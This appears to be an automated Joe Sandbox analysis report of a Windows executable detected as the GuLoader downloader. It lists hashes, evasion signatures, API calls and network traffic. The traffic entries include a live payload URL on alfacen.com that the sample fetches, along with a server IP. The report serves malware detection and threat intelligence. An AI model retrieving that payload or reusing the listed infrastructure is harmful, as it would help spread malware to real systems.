Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3507071243740008011.exe

Overview

General Information

Sample name:3507071243740008011.exe
Analysis ID:1538168
MD5:300ffb3fd65eb4a84a14802828f91e38
SHA1:937574595a8e68f7a77b95a7f99b530007f9fc5c
SHA256:24beefbe74ccf89b245d50c7279c83803186566d4be4f89f875e203ec2f4edf9
Tags:exeuser-Racco42
Infos:

Detection

GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Opens the same file many times (likely Sandbox evasion)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 3507071243740008011.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\3507071243740008011.exe" MD5: 300FFB3FD65EB4A84A14802828F91E38)
    • 3507071243740008011.exe (PID: 8124 cmdline: "C:\Users\user\Desktop\3507071243740008011.exe" MD5: 300FFB3FD65EB4A84A14802828F91E38)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2641992068.0000000005438000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: 3507071243740008011.exeAvira: detected
    Multi AV Scanner detection for submitted file
    Source: 3507071243740008011.exeReversingLabs: Detection: 31%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: 3507071243740008011.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.4:49929 version: TLS 1.2
    Source: 3507071243740008011.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040652875.00000000369C1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 3507071243740008011.exe, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040652875.00000000369C1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /jFhxxDhhDcCKVgiwlWM221.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: alfacen.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jFhxxDhhDcCKVgiwlWM221.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: alfacen.comCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: alfacen.com
    Source: 3507071243740008011.exe, 00000000.00000000.1711380790.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000005.00000000.2638137136.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
    Source: 3507071243740008011.exe, 00000005.00000001.2640954527.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: 3507071243740008011.exe, 00000005.00000001.2640954527.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: 3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/
    Source: 3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/R
    Source: 3507071243740008011.exe, 00000005.00000002.3376402237.0000000006C58000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3395519172.0000000036160000.00000004.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3376402237.0000000006CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.bin
    Source: 3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.binL
    Source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
    Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.4:49929 version: TLS 1.2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405425
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D935C0 NtCreateMutant,LdrInitializeThunk,5_2_36D935C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_36D92DF0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D93090 NtSetValueKey,5_2_36D93090
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D93010 NtOpenDirectoryObject,5_2_36D93010
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D93D70 NtOpenThread,5_2_36D93D70
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D93D10 NtOpenProcessToken,5_2_36D93D10
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D939B0 NtGetContextThread,5_2_36D939B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D94650 NtSuspendThread,5_2_36D94650
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D94340 NtSetContextThread,5_2_36D94340
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92EE0 NtQueueApcThread,5_2_36D92EE0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92E80 NtReadVirtualMemory,5_2_36D92E80
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92EA0 NtAdjustPrivilegesToken,5_2_36D92EA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92E30 NtWriteVirtualMemory,5_2_36D92E30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92FE0 NtCreateFile,5_2_36D92FE0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92F90 NtProtectVirtualMemory,5_2_36D92F90
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92FB0 NtResumeThread,5_2_36D92FB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92FA0 NtQuerySection,5_2_36D92FA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92F60 NtCreateProcessEx,5_2_36D92F60
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92F30 NtCreateSection,5_2_36D92F30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92CC0 NtQueryVirtualMemory,5_2_36D92CC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92CF0 NtOpenProcess,5_2_36D92CF0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92CA0 NtQueryInformationToken,5_2_36D92CA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92C70 NtFreeVirtualMemory,5_2_36D92C70
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92C60 NtCreateKey,5_2_36D92C60
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92C00 NtQueryInformationProcess,5_2_36D92C00
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92DD0 NtDelayExecution,5_2_36D92DD0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92DB0 NtEnumerateKey,5_2_36D92DB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92D10 NtMapViewOfSection,5_2_36D92D10
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92D00 NtSetInformationFile,5_2_36D92D00
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92D30 NtUnmapViewOfSection,5_2_36D92D30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92AD0 NtReadFile,5_2_36D92AD0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92AF0 NtWriteFile,5_2_36D92AF0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92AB0 NtWaitForSingleObject,5_2_36D92AB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92BF0 NtAllocateVirtualMemory,5_2_36D92BF0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92BE0 NtQueryValueKey,5_2_36D92BE0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92B80 NtQueryInformationFile,5_2_36D92B80
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92BA0 NtEnumerateValueKey,5_2_36D92BA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D92B60 NtClose,5_2_36D92B60
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00404C620_2_00404C62
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00406ADD0_2_00406ADD
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_004072B40_2_004072B4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E116CC5_2_36E116CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DA56305_2_36DA5630
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1F7B05_2_36E1F7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D514605_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1F43F5_2_36E1F43F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E295C35_2_36E295C3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFD5B05_2_36DFD5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E175715_2_36E17571
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E012ED5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B2C05_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7D2F05_2_36D7D2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D652A05_2_36D652A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DA739A5_2_36DA739A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4D34C5_2_36D4D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1132D5_2_36E1132D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1F0E05_2_36E1F0E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E170E95_2_36E170E9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D670C05_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0F0CC5_2_36E0F0CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6B1B05_2_36D6B1B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E2B16B5_2_36E2B16B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F1725_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D9516C5_2_36D9516C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D69EB05_2_36D69EB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D23FD25_2_36D23FD2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D23FD55_2_36D23FD5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F925_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1FFB15_2_36E1FFB1
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1FF095_2_36E1FF09
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1FCF25_2_36E1FCF2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD9C325_2_36DD9C32
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7FDC05_2_36D7FDC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E17D735_2_36E17D73
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D63D405_2_36D63D40
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E11D5A5_2_36E11D5A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0DAC65_2_36E0DAC6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E01AA35_2_36E01AA3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFDAAC5_2_36DFDAAC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DA5AA05_2_36DA5AA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E17A465_2_36E17A46
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1FA495_2_36E1FA49
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD3A6C5_2_36DD3A6C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D9DBF95_2_36D9DBF9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD5BF05_2_36DD5BF0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7FB805_2_36D7FB80
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1FB765_2_36E1FB76
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D638E05_2_36D638E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DCD8005_2_36DCD800
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D699505_2_36D69950
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7B9505_2_36D7B950
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF59105_2_36DF5910
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7C6E05_2_36D7C6E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5C7C05_2_36D5C7C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D847505_2_36D84750
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D607705_2_36D60770
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0E4F65_2_36E0E4F6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E124465_2_36E12446
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E044205_2_36E04420
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E205915_2_36E20591
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D605355_2_36D60535
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE02C05_2_36DE02C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E002745_2_36E00274
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E203E65_2_36E203E6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6E3F05_2_36D6E3F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1A3525_2_36E1A352
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF20005_2_36DF2000
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E181CC5_2_36E181CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E141A25_2_36E141A2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E201AA5_2_36E201AA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE81585_2_36DE8158
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFA1185_2_36DFA118
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D501005_2_36D50100
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1EEDB5_2_36E1EEDB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D72E905_2_36D72E90
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1CE935_2_36E1CE93
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D60E595_2_36D60E59
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1EE265_2_36E1EE26
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D52FC85_2_36D52FC8
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6CFE05_2_36D6CFE0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDEFA05_2_36DDEFA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD4F405_2_36DD4F40
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E02F305_2_36E02F30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D80F305_2_36D80F30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DA2F285_2_36DA2F28
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D50CF25_2_36D50CF2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E00CB55_2_36E00CB5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D60C005_2_36D60C00
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5ADE05_2_36D5ADE0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D78DBF5_2_36D78DBF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFCD1F5_2_36DFCD1F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6AD005_2_36D6AD00
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5EA805_2_36D5EA80
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E16BD75_2_36E16BD7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1AB405_2_36E1AB40
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8E8F05_2_36D8E8F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D468B85_2_36D468B8
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D628405_2_36D62840
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6A8405_2_36D6A840
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E2A9A65_2_36E2A9A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D629A05_2_36D629A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D769625_2_36D76962
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: String function: 36DA7E54 appears 108 times
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: String function: 36DDF290 appears 105 times
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: String function: 36D4B970 appears 262 times
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: String function: 36DCEA12 appears 86 times
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: String function: 36D95130 appears 58 times
    Source: 3507071243740008011.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: 3507071243740008011.exe, 00000005.00000003.3040652875.0000000036AE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3507071243740008011.exe
    Source: 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036FF1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3507071243740008011.exe
    Source: 3507071243740008011.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal80.troj.evad.winEXE@2/8@1/1
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile created: C:\Users\user\AppData\Roaming\pechayJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile created: C:\Users\user\AppData\Local\Temp\nso624C.tmpJump to behavior
    Source: 3507071243740008011.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile read: C:\Users\desktop.iniJump to behavior
